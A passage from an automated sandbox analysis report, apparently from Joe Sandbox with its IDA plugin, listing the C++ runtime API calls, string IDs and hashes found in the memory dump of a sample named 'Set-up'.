                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocstr$memcpy$GetcvtH_prolog3_catch___lc_codepage_func___lc_handle_funclocaleconvstrlen
                                                                                              • String ID: $+xv
                                                                                              • API String ID: 1805598471-1686923651
                                                                                              • Opcode ID: 403c81a2973e0440528c602d7ec89759a598ef7c501574bf6aa0627701afa268
                                                                                              • Instruction ID: 54595b4e3961df099461d6261713495c6c57155ab912505610cfd3f35c08a8ef
                                                                                              • Opcode Fuzzy Hash: 403c81a2973e0440528c602d7ec89759a598ef7c501574bf6aa0627701afa268
                                                                                              • Instruction Fuzzy Hash: 1B4191B0854B81AED721CF74C891B27BFF8BF19204F04465AE59A87A41E738E714CBA1
                                                                                              APIs
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300A9
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300B8
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300C7
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300D6
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC300E5
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?), ref: 6BC30170
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 6BC304A2
                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?), ref: 6BC30338
                                                                                                • Part of subcall function 6BC2A0ED: _Maklocchr.LIBCPMT ref: 6BC2A180
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?), ref: 6BC3019B
                                                                                                • Part of subcall function 6BC2A0ED: _Maklocchr.LIBCPMT ref: 6BC2A11C
                                                                                                • Part of subcall function 6BC2A0ED: _Maklocchr.LIBCPMT ref: 6BC2A153
                                                                                                • Part of subcall function 6BC2A0ED: _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC2A275
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?), ref: 6BC30315
                                                                                              • ?_Getint@?$time_get@_WV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@_WU?$char_traits@_W@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?,?,?,?,?), ref: 6BC304CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@_$V?$istreambuf_iterator@_$Maklocchr$Getint@?$time_get@_W@std@@@2@0W@std@@@std@@@std@@$?sgetc@?$basic_streambuf@_MbrtowcStolxW@std@@@std@@
                                                                                              • String ID:
                                                                                              • API String ID: 368526784-0
                                                                                              • Opcode ID: 769c943989ad4fe4b82485be86eeb6fbfe3a1ffc50ade82a610b67df4753f105
                                                                                              • Instruction ID: 914afd866fa9ac44a9fedcf09be7163fa81af675b10e484d61ac928f42fb0cfc
                                                                                              • Opcode Fuzzy Hash: 769c943989ad4fe4b82485be86eeb6fbfe3a1ffc50ade82a610b67df4753f105
                                                                                              • Instruction Fuzzy Hash: AEF1683281021EAFDF05DF94C881AEE3BB8FF04304F80819AF96596141F7799B65DBA1
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: memchrtolower$__aulldiv_errnoisspace
                                                                                              • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                              • API String ID: 4155486202-1956417402
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC29C43
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000018), ref: 6BC29C51
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC1E3A1: __EH_prolog3.LIBCMT ref: 6BC1E3A8
                                                                                                • Part of subcall function 6BC1E3A1: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3B2
                                                                                                • Part of subcall function 6BC1E3A1: int.LIBCPMT(00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004,6BC3969A), ref: 6BC1E3C9
                                                                                                • Part of subcall function 6BC1E3A1: std::locale::_Getfacet.LIBCPMT ref: 6BC1E3D2
                                                                                                • Part of subcall function 6BC1E3A1: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3E895,?,0000000C,6BC3962C,?,?,?,?,?,?,?,?,00000004), ref: 6BC1E432
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC29C7A
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3std::locale::facet::_$??1_?getloc@ios_base@std@@?sgetc@?$basic_streambuf@_DecrefGetfacetIncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcU?$char_traits@_Vlocale@2@W@std@@@std@@std::_std::locale::_
                                                                                              • String ID: #$E$O$Q
                                                                                              • API String ID: 2720581600-3590659638
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC2A2CD
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,00000018), ref: 6BC2A2DB
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC1E444: __EH_prolog3.LIBCMT ref: 6BC1E44B
                                                                                                • Part of subcall function 6BC1E444: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC1E455
                                                                                                • Part of subcall function 6BC1E444: int.LIBCPMT(00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?,?), ref: 6BC1E46C
                                                                                                • Part of subcall function 6BC1E444: std::locale::_Getfacet.LIBCPMT ref: 6BC1E475
                                                                                                • Part of subcall function 6BC1E444: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC3EE77,?,0000000C,6BC39639,?,?,?,?,?,?,?,?,?), ref: 6BC1E4D5
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC2A304
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                                • Part of subcall function 6BC2490A: ?sgetc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEGXZ.MSVCP100(?,6BC249A8,?,?,00000000,?,6BC29E20,?,?,?,?,?,00000018), ref: 6BC24915
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3std::locale::facet::_$??1_?getloc@ios_base@std@@?sgetc@?$basic_streambuf@_DecrefGetfacetIncrefLockitLockit::_Lockit@std@@MaklocchrMbrtowcU?$char_traits@_Vlocale@2@W@std@@@std@@std::_std::locale::_
                                                                                              • String ID: #$E$O$Q
                                                                                              • API String ID: 2720581600-3590659638
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000,?,?), ref: 6BC39348
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C9D0), ref: 6BC3935E
                                                                                              • setlocale.MSVCR100 ref: 6BC39374
                                                                                              • setlocale.MSVCR100 ref: 6BC3939B
                                                                                              • setlocale.MSVCR100 ref: 6BC393A8
                                                                                              • strcmp.MSVCR100 ref: 6BC393CF
                                                                                              • ??4?$_Yarn@D@std@@QAEAAV01@PBD@Z.MSVCP100(00000000,00000000), ref: 6BC393DE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: setlocale$??0exception@std@@??4?$_D@std@@ExceptionThrowV01@Yarn@strcmp
                                                                                              • String ID: ?
                                                                                              • API String ID: 3633093009-1684325040
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC1AD40
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?,00000020,6BC16B66,00000001), ref: 6BC1AD57
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C848), ref: 6BC1AD6D
                                                                                              • ?Alloc@Concurrency@@YAPAXI@Z.MSVCR100(00000014,00000020,6BC16B66,00000001), ref: 6BC1AD74
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(00000028), ref: 6BC1AD94
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC1ADBB
                                                                                              • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(000000FF), ref: 6BC1ADCB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0exception@std@@??1_?wait@event@Alloc@ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 449592796-988830941
                                                                                              APIs
                                                                                              • __EH_prolog3_GS.LIBCMT ref: 6BC31DFD
                                                                                              • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP100(?,0000006C,6BC358E5,?,?,?,00000000,?,?,00000060,6BC385E1,?,?,?,?,?), ref: 6BC31E1E
                                                                                                • Part of subcall function 6BC1CFBC: std::locale::facet::_Incref.LIBCPMT ref: 6BC1CFCC
                                                                                                • Part of subcall function 6BC2A8AF: __EH_prolog3.LIBCMT ref: 6BC2A8B6
                                                                                                • Part of subcall function 6BC2A8AF: std::_Lockit::_Lockit.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8C0
                                                                                                • Part of subcall function 6BC2A8AF: int.LIBCPMT(00000000,00000014,6BC395A9,?), ref: 6BC2A8D7
                                                                                                • Part of subcall function 6BC2A8AF: std::locale::_Getfacet.LIBCPMT ref: 6BC2A8E0
                                                                                                • Part of subcall function 6BC2A8AF: ??1_Lockit@std@@QAE@XZ.MSVCP100(00000000,00000000,00000014,6BC395A9,?), ref: 6BC2A940
                                                                                                • Part of subcall function 6BC1BBA7: std::locale::facet::_Decref.LIBCPMT(6BC3BAD4,?,?,6BC1D257), ref: 6BC1BBAD
                                                                                              • ?_Hexdig@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHDDDD@Z.MSVCP100(?,?,00000030,00000061,00000041,?,?,?,00000000,0000006C,6BC358E5,?,?,?,00000000,?), ref: 6BC3210A
                                                                                              • localeconv.MSVCR100 ref: 6BC321A4
                                                                                              • ?_Hexdig@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHDDDD@Z.MSVCP100(?,00000030,00000030,00000061,00000041,?,?,?), ref: 6BC32227
                                                                                              • ?_Hexdig@?$num_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHDDDD@Z.MSVCP100(?,?,00000030,00000061,00000041,?,?,?,?,?,?), ref: 6BC31FAE
                                                                                                • Part of subcall function 6BC248B1: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,6BC24964,?,?,00000000,?,6BC29830,?,?,?,?,?,00000014), ref: 6BC248BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$D@std@@@std@@@std@@Hexdig@?$num_get@V?$istreambuf_iterator@$std::locale::facet::_$??1_?getloc@ios_base@std@@?sgetc@?$basic_streambuf@D@std@@@std@@DecrefGetfacetH_prolog3H_prolog3_IncrefLockitLockit::_Lockit@std@@Vlocale@2@localeconvstd::_std::locale::_
                                                                                              • String ID: $
                                                                                              • API String ID: 1717552424-3993045852
                                                                                              APIs
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?), ref: 6BC2FC73
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?), ref: 6BC2FE20
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000000C,?,?,?,?,?,?,?,?,?,?), ref: 6BC2FF70
                                                                                                • Part of subcall function 6BC248B1: ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP100(?,6BC24964,?,?,00000000,?,6BC29830,?,?,?,?,?,00000014), ref: 6BC248BC
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?), ref: 6BC2FC9E
                                                                                                • Part of subcall function 6BC29AC7: _Stolx.MSVCP100(?,?,0000000A,?,?,?,?), ref: 6BC29BEB
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?), ref: 6BC2FDFD
                                                                                              • ?_Getint@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@ABAHAAV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@0HHAAH@Z.MSVCP100(?,?,?,00000001,0000001F,?,?,?,?,?,?,?,?,?,?), ref: 6BC2FF98
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: U?$char_traits@$V?$istreambuf_iterator@$D@std@@@2@0D@std@@@std@@@std@@Getint@?$time_get@$?sgetc@?$basic_streambuf@D@std@@@std@@Stolx
                                                                                              • String ID: 9
                                                                                              • API String ID: 2585351434-2366072709
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: tolower$_errnoisspacememchr
                                                                                              • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                              • API String ID: 2328037959-1956417402
                                                                                              APIs
                                                                                              • _Maklocchr.LIBCPMT ref: 6BC25BEB
                                                                                                • Part of subcall function 6BC223EC: _Mbrtowc.MSVCP100(00000000,00000000,00000001,00000000,6BC3C44E,?,?,?,6BC3C44E,?), ref: 6BC2240C
                                                                                              • _Maklocbyte.LIBCPMT ref: 6BC25C31
                                                                                              • _Maklocbyte.LIBCPMT ref: 6BC25C68
                                                                                                • Part of subcall function 6BC24780: ?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP100(?,?,?,6BC25408), ref: 6BC24792
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Maklocbyte$?sputc@?$basic_streambuf@_MaklocchrMbrtowcU?$char_traits@_W@std@@@std@@
                                                                                              • String ID: #$E$O$Q
                                                                                              • API String ID: 3359182016-3590659638
                                                                                              APIs
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1AF26
                                                                                              • _CxxThrowException.MSVCR100(6BC117B8,6BC4C848), ref: 6BC1AF3C
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC1AF55
                                                                                              • ?_Xfunc@tr1@std@@YAXXZ.MSVCP100 ref: 6BC1AF79
                                                                                              • ?set@event@Concurrency@@QAEXXZ.MSVCR100 ref: 6BC1AFC9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??0exception@std@@$?set@event@Concurrency@@ExceptionThrowXfunc@tr1@std@@
                                                                                              • String ID: _PMessage$_PSource
                                                                                              • API String ID: 1750389936-3961265847
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19B49
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19B5A
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC19B78
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC19B8E
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19BC1
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19BD4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC17EC6
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC17ED7
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(00000000), ref: 6BC17EF5
                                                                                              • _CxxThrowException.MSVCR100(?,6BC4C928), ref: 6BC17F0B
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17F3E
                                                                                              • ??0bad_target@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC17F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$Lock@details@ReentrantScoped_lock@_$??0_??0bad_target@??0exception@std@@??1_ExceptionH_prolog3ThrowV123@@
                                                                                              • String ID: _PTarget
                                                                                              • API String ID: 467497307-988830941
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BC19AAF
                                                                                              • ??0_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@AAV123@@Z.MSVCR100(?,0000001C), ref: 6BC19AC0
                                                                                              • ??0exception@std@@QAE@ABQBD@Z.MSVCR100(?), ref: 6BC19ADF
                                                                                              • _CxxThrowException.MSVCR100 ref: 6BC19AF5
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19B07
                                                                                              • ??1_Scoped_lock@_ReentrantPPLLock@details@Concurrency@@QAE@XZ.MSVCR100 ref: 6BC19B2D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.2150334894.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true
                                                                                              • Associated: 00000008.00000002.2149818963.000000006BC10000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2151807645.000000006BC6E000.00000004.00000001.01000000.0000000F.sdmp
                                                                                              • Associated: 00000008.00000002.2152116355.000000006BC72000.00000002.00000001.01000000.0000000F.sdmp
                                                                                              Joe Sandbox IDA Plugin
